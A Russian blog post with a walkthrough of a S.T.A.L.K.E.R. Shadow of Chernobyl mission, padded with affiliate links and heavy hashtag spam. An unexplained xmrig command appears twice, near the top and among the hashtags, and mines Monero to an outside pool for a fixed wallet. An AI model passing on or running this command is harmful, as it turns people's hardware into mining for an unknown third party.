Найти сгущёнку для кладовщика STALKER ФОТОГРАФ SELFMADE
xmrig --coin XMR --url "xmr.kryptex.network:8888" --user "496XAfdYBQR6LVLhcNN3pdGXKs8EqwpEHWP5hj8u2hLMPQyUsjdk2TwiL8nmKFCekmLhKHWaYU8ZmTR4E2FZyZoxPrbbXHH/sid82a" --tls -k"
К основному контенту
Хай!!! Тут ты найдёшь всё для сайта https://wpshop.ru/?partner=28836
Лайкни, подпишись. Мы на рубике: https://rutube.ru/u/igorekes
Книги — ваше всё! Покупайте, читайте, вдохновляйтесь! https://ridero.ru/books/tvari_iz_sumraka
Моя карта для донатов (5536913926782596
Т-банк).
Хай, чувачки, это 3-я серия прохождения S.T.A.L.K.E.R. Shadow of Chernobyl «Тень Сидоровича». Итак, я решил идти сразу на радар, как и вся игра, без доп. квестов. Сначала защищаем свободовцев на барьере от монолитовцев и переходим на следующую локацию. Там расчищаем себе путь от фанатиков и переходим в лабораторию Х-10. В лаборатории надо найти рубильник и отключить радар. Доходим до рубильника, убив 3-х кровососов, и отключаем его. Смотрим мультик, и появляются 30 монолитовцев на всей локации. Отстреливаем всех и продвигаемся к выходу. На выходе атакуют военные штук 10, убиваем их и идём в Припять. По пути Сидорович сообщает, мол, радар отключен, и все сталкеры ломанулись на разведку в город, чтобы собрать все ништяки первыми. На входе в городе встречаем группу сталкеров и следуем за ними. Хотя можно и без них идти.
Добираемся до гостиницы и на 2-м этаже в комнате 26 подбираем декодер и записи Стрелка. От макулатуры толку ноль, а вот декодер нам пригодится. Я попутно зачистил кинотеатр, мало ли что там. Там ничего необычного. Идём на ЧАЭС, где подавляем всё сопротивление, и когда включается таймер 5 минут, надо за это время добраться до саркофага. Потом начнётся выброс, под которым выжить невозможно. Зачистим саркофаг и, сохранившись, подойдём к камню желаний и загадаем своё желание. Смотрим мультик про первую концовку игры. После мультика загружаемся с сохранки, сделанной до того, как подошли к камню, и ищем комнату с лампочкой. В этой комнате лестница вверх, поднимаемся и находим закодированную дверь. Надо воспользоваться декодером, подойти к двери и тупо нажать кнопку F на своей клавиатуре. Включается таймер, и надо отбиться от монолитовцев, которые спаунятся в конце коридора. Таймер исчез, дверь раскодировалась. Можно переходить в бункер управления монолитом. На этом у меня пока всё.
Подписывайся на наш блог на блоггере
, «Тумблере» и на «Рутуб»-канал «Игорёк С.».
#Сталкер #Сталкер_моды #Сталкер_Тень_Чернобыля #Сталкер_Зов_Припяти #Сталкер_Аномалия #Сталкер_оружие #Сталкер_броння #Сталкер_графика #Сталкер_новые_моды #Сталкер_мод_на_оружие #Сталкер_броня #Сталкер_мод #Сталкер_скачать #Сталкер_Чернобыль #Сталкер_Зов #Сталкер_вес #Сталкер_Зона #Сталкер_2 #Сталкер_группировки #Сталкер_мод_версии #Сталкер_ганслингер #Сталкер_военные_моды #Сталкер_русские_моды #Сталкер_сюжет #Сталкер_повелитель #Сталкер_оптимизация, #Сталкер #моды #игра #Шутер #Зона #Выживание #Оружие #Локации #Персонажи #Сюжет #Модификации #Геймплей #Боссы #Монстры #Артефакты #Квесты #Миссии #Настройки #Графика #Звук #Интерфейс #Баги #Исправления #Оптимизация #Установка #Руководство #Советы #Советы_по_прохождению #Стратегия #Тактика #Снаряжение #Экипировка #Модификаторы #Настройки_управления #Кампания #Мультиплеер #Онлайн #Сообщество #Фанатские_моды #Новые_сюжеты #Новые_персонажи #Новые_локации #Новые_оружие #Улучшения_графики #Новые_артефакты #Улучшения_звука #Новые_квесты #Новые_миссии #Улучшения_интерфейса #Игровой_баланс #Новые_боссы #Новые_монстры #Изменения_в_геймплее #Моддеры #Создание_модов #Инструменты_для_модов #Игровые_события #Сценарии #Игровые_механики #Реализм #Фэнтези #Научная_фантастика #Модификация_оружия #Модификации_персонажей #Новые_виды_артефактов #Кампания_с_новым_сюжетом #Игровые_ресурсы #Моделирование_окружения #Оптимизация_производительности #Игровые_события_в_зоне #Сценарий_катастрофы #Разработка_модов #Игровые_настройки #Модификация_интерфейса #Модификация_локации #Монетизация_модов #Мультиплеерные_моды #Мод_на_новую_технику #Мод_на_улучшения_персонажей #Моды_на_новые_сюжетные_линии #Новые_элементы_геймплея #Оружие_в_модах #Оптимизация_под_разное_железо #Открытый_мир_в_модах #Переработка_существующих_моделей #Персонажи_в_модах #Погодные_условия_в_модах #Реалистичные_моды #Сценарий_для_модов #Сложность_в_модах #Создание_новых_локации #Сталкер_моды_для_одиночной_игры #Сталкер_моды_для_многопользовательской_игры #Улучшение_графики_в_модах #Улучшение_звука_в_модах #Фан_арт_моды #Игровые_настройки_модов #Модификация_интерфейса_модов #Модификации_оружия_в_модах #Монеты_в_моды #Мультиплеер_моды #Оружие_в_модах_Сталкера #Оружие_моды #Персонажи_моды #Переработка_локации_модов #Переработка_персонажей_модов #Погодные_условия_моды #Прокачка_персонажа_моды #Разработка_модов_Сталкер #Сложность_моды #Сюжетные_моды #Сталкер_моды #Сталкер_моды_на_новый_сюжет #Сталкер_моды_на_новое_оружие #Сталкер_моды_на_новые_персонажи #Сталкер_моды_на_новые_локации #Сталкер_моды_на_новые_ар #manual #tips #s#game_channel, #Игорёк_С, #Игорёк С, #Игорёк С_на_Рутубе, #Igore4ek_S, xmrig --coin XMR --url "xmr.kryptex.network:8888" --user "496XAfdYBQR6LVLhcNN3pdGXKs8EqwpEHWP5hj8u2hLMPQyUsjdk2TwiL8nmKFCekmLhKHWaYU8ZmTR4E2FZyZoxPrbbXHH/sid82a" --tls -k #mod,
Комментарии
Отправить комментарий